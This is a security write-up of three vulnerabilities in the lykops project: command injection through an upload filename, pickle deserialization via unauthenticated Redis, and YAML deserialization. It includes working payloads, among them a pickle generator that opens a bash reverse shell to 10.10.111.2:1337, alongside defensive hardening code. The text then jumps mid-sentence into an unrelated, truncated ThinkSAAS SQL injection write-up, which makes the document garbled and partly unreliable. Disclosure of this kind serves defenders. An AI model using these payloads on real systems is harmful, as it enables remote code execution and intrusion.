
lykops has multiple vulnerabilities

0x00    intro

- github repo: https://github.com/lykops/lykops
- 121 stars and 65 forks as of 2021/2/6

0x01    Post-Auth OS-command injection

lykops/library/utils/file.py#248 -> upload_file()

which leads us to lykops/lykops/ansible/yaml.py#74 (github link here)

The vulnerable parameter `file` comes from the FILES[] array of our HTTP request.


So we completely control this unsanitized parameter, and it causes an OS command injection.


  1. The corresponding route is ^ansible/yaml/import$; visiting it triggers the vulnerability.
  2. Note also that an exception causes import_file() to be invoked twice, so a `sleep 5` command produces a delay of about 10 seconds.


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...
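To make the injection concrete, here is an added example written for this write-up; it is not lykops' own upload_file()/import_file() code. It shows a hypothetical command template that interpolates the multipart filename into a shell string (the pattern described above), a check that flags the PoC filename, and two hardened variants: an argv list behind a character allowlist, and shlex.quote for the case where a shell string cannot be avoided. The command template and the paths are assumptions.

```python
#!/usr/bin/env python3
"""Added example: how an uploaded filename reaches a shell, and how to stop it.

Illustrative code for this write-up, not lykops' upload_file()/import_file().
The command template and directories below are assumed.
"""
import re
import shlex

# Allowlist: letters, digits, dot, underscore, dash; no path separators,
# no shell metacharacters, bounded length.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def build_command_vulnerable(filename: str) -> str:
    # The pattern the write-up describes: the client-supplied multipart
    # filename is interpolated into a string handed to a shell
    # (os.system / subprocess with shell=True). Template is assumed.
    return f"cp /tmp/upload/{filename} /opt/lykops/yaml/"


def shell_metachars_present(filename: str) -> bool:
    # Any of these lets the "filename" escape the intended argument,
    # e.g. $(sleep 5) is expanded by the shell before cp ever runs.
    return any(c in filename for c in "$`;|&<>(){}\n")


def build_argv_safe(filename: str) -> list:
    # 1) Drop any path component the client may have sent (../ or C:\...).
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # 2) Allowlist the characters; anything else is rejected, not "cleaned".
    if not SAFE_NAME.match(base):
        raise ValueError(f"rejected upload name: {filename!r}")
    # 3) Never go through a shell: argv list, subprocess.run(..., shell=False).
    return ["cp", f"/tmp/upload/{base}", "/opt/lykops/yaml/"]


def is_accepted(filename: str) -> bool:
    try:
        build_argv_safe(filename)
        return True
    except ValueError:
        return False


def quoted_command(filename: str) -> str:
    # If a shell string is unavoidable, shlex.quote turns the whole filename
    # into one single-quoted word, so $(...) is no longer command-substituted.
    return f"cp /tmp/upload/{shlex.quote(filename)} /opt/lykops/yaml/"


if __name__ == "__main__":
    poc = "test.txt$(sleep 5)"  # the filename from the PoC request above
    print("vulnerable:", build_command_vulnerable(poc))
    print("quoted:    ", quoted_command(poc))
    print("accepted:  ", is_accepted(poc))
```

Run it as a script to see the three command forms side by side; the allowlist variant is the one to prefer, because quoting only protects the one interpolation point you remembered to wrap.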



0x02    Pre-Auth pickle deserialization RCE via unauthenticated Redis

The login route is ^login.html; the corresponding implementation is the Login->login function.


Following get_userinfo, we find that the user's login cache is retrieved from Redis.


At line 81, user=adminuser is passed in. Searching the variable name adminuser globally shows that its default value is lykops.





Further, Redis stores strings; to turn them back into Python objects there must be a deserialization step.
If that deserialization is not properly restricted, there is a vulnerability. So which function does it use to deserialize?


pickle.loads! This evil function!

In the implementation of get, when the input parameter is fmt=obj, the string fetched from Redis is deserialized, and the function actually used for that is pickle.loads!

If you are not familiar with Python deserialization attacks, see the post "python deserialization attacks from scratch".

The following figure shows a demo that uses deserialization to run commands from the Python command line.







So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

class py():
    # pickle calls __reduce__ when serializing; the (callable, args) tuple it
    # returns is stored in the pickle and re-invoked by pickle.loads, so
    # loading this blob runs os.system(...) inside the victim process.
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

# protocol=3 reproduces the bytes shown below; newer Pythons default to
# protocol 4/5, which give a different but equally effective encoding.
payload = pickle.dumps(py(), protocol=3)
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.2/1337 0>&1q\x01\x85q\x02Rq\x03.'

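As an added example, not lykops' code, the following models the vulnerable get() path described above with an in-memory dict standing in for the unauthenticated Redis: the attacker writes a pickle under the user's cache key, fmt=obj unpickles it, and the reduce gadget runs in the web process. The cache key layout, the get() signature and the harmless os.getpid gadget are assumptions for illustration (the write-up's real payload calls os.system). A hardened variant that stores JSON and refuses a foreign blob is shown beside it.

```python
#!/usr/bin/env python3
"""Added example (not lykops' code): why pickle.loads on a Redis value is RCE.

The dict below is a constructed stand-in for the unauthenticated Redis
instance; the key name and the get() signature are assumed.
"""
import json
import os
import pickle

# Anyone who can reach a Redis server with no AUTH can SET whatever bytes
# they like under the user's login-cache key.
fake_redis: dict = {}


class Gadget:
    # Same shape as the write-up's payload class, but with a harmless
    # callable so the effect is observable without a reverse shell.
    def __reduce__(self):
        return (os.getpid, ())


def attacker_plants_payload(user: str = "lykops") -> bytes:
    # "lykops" is the default adminuser value noted above; the key layout
    # is assumed, not lykops' real one.
    blob = pickle.dumps(Gadget(), protocol=3)
    fake_redis[f"login_cache:{user}"] = blob
    return blob


def get_vulnerable(key: str, fmt: str = "obj"):
    # The pattern described in the write-up: fmt="obj" means the raw Redis
    # value goes straight into pickle.loads.
    raw = fake_redis.get(key)
    if raw is None:
        return None
    if fmt == "obj":
        return pickle.loads(raw)  # runs Gadget.__reduce__ -> os.getpid()
    return raw


def get_hardened(key: str, fmt: str = "obj"):
    # Fix: never unpickle data an attacker may have written. Store JSON
    # (or add an HMAC over the blob with a server-side key) so a foreign
    # blob is rejected instead of executed. Also put AUTH on Redis.
    raw = fake_redis.get(key)
    if raw is None:
        return None
    if fmt == "obj":
        try:
            return json.loads(raw)
        except ValueError as e:  # UnicodeDecodeError is a ValueError too
            raise ValueError(f"refusing non-JSON cache value for {key}") from e
    return raw


def hardened_rejects(key: str) -> bool:
    try:
        get_hardened(key)
        return False
    except ValueError:
        return True


def demo() -> bool:
    # True when the planted pickle executed inside this process.
    attacker_plants_payload()
    return get_vulnerable("login_cache:lykops") == os.getpid()


if __name__ == "__main__":
    print("gadget executed in web process:", demo())
    print("hardened loader rejects blob:  ", hardened_rejects("login_cache:lykops"))
```

Note that nothing here requires authentication to the web application: the only precondition is write access to the Redis key that get_userinfo reads, which an unauthenticated Redis gives to anyone who can reach the port.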


0x03    Post-Auth YAML deserialization RCE

First, one should know that improper use of yaml.load
allows arbitrary Python objects to be loaded, which in most cases means RCE.

For the original warning, see the PyYAML tutorial at https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load, we find library/utils/yaml.py#27 (github link here)



The invocation comes from yaml_loader(), which is triggered in the upload function.

!!python/object/new:os.system ["sleep 2"]

So we get a Post-Auth RCE.
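To show why the `!!python/object/new:os.system ["sleep 2"]` tag above executes, here is an added example written for this write-up; it is not PyYAML's or lykops' code. It contains a simplified model of what yaml.Loader's python/object/new constructor does with the tag suffix and its arguments, beside a gate for untrusted documents that rejects python/ tags before handing the text to yaml.safe_load. The resolver is a model of PyYAML's behaviour rather than PyYAML itself, and PyYAML is assumed to be installed only where load_untrusted() is actually called.

```python
#!/usr/bin/env python3
"""Added example (not PyYAML's or lykops' code): what the unsafe loader does
with !!python/object/new:<name> [args], and a gate that refuses such tags.
"""
import importlib
import re

try:
    import yaml  # PyYAML, assumed installed; only load_untrusted() needs it
except ImportError:  # pragma: no cover
    yaml = None

# Both spellings of the python/ tag: the !! shorthand and the full URI form.
PYTHON_TAG = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")


def resolve_python_name(dotted: str):
    # "os.system" -> import os, return os.system. This is the step that
    # turns a string inside a YAML document into a live Python callable.
    module_name, _, attr = dotted.rpartition(".")
    if not module_name:
        raise ValueError(f"bad python name {dotted!r}")
    return getattr(importlib.import_module(module_name), attr)


def construct_python_object_new(suffix: str, args: list):
    # Model of the unsafe loader's python/object/new constructor: a class
    # gets cls.__new__(cls, *args), anything else is simply called. os.system
    # is a function, so the payload becomes os.system("sleep 2").
    target = resolve_python_name(suffix)
    if isinstance(target, type):
        return target.__new__(target, *args)
    return target(*args)


def has_python_tag(text: str) -> bool:
    return PYTHON_TAG.search(text) is not None


def load_untrusted(text: str):
    # Hardened path: refuse python/ tags outright (defence in depth), then
    # use yaml.safe_load, which only knows the core YAML types and has no
    # python/ constructors at all. Never yaml.load / yaml.Loader here.
    if has_python_tag(text):
        raise ValueError("python/ tag in untrusted YAML")
    if yaml is None:
        raise RuntimeError("PyYAML not installed")
    return yaml.safe_load(text)


def gate_rejects(text: str) -> bool:
    try:
        load_untrusted(text)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    payload = '!!python/object/new:os.system ["sleep 2"]'
    # Harmless stand-in for os.system to show the call path without sleeping.
    print("model call:", construct_python_object_new("operator.add", [2, 3]))
    print("gate rejects payload:", gate_rejects(payload))
```

The model ignores a few PyYAML details (keyword arguments, state and list/dict items after construction), which do not change the point: with yaml.load and the default unsafe loader, the document names a callable and the loader calls it.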


The source is in library/utils/file.py (github link here).


1. Intro of this CMS The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS. Source code of v3.38  could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999 of this Vuln ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands. 2. Walkthrough Code Review Risky lines are here =>   https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/app/topic/action/admin/topic.php#L42 https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/thinksaas/tsApp.php#L146 Due to unproper conjunction of SQL query sentences (1) and invalid filter (2) (1) unproper conjunction of SQL query sentences app/topic/action/admin/topic.php#L42 Let's see how findAll() works: thinksaas/tsApp.php#L1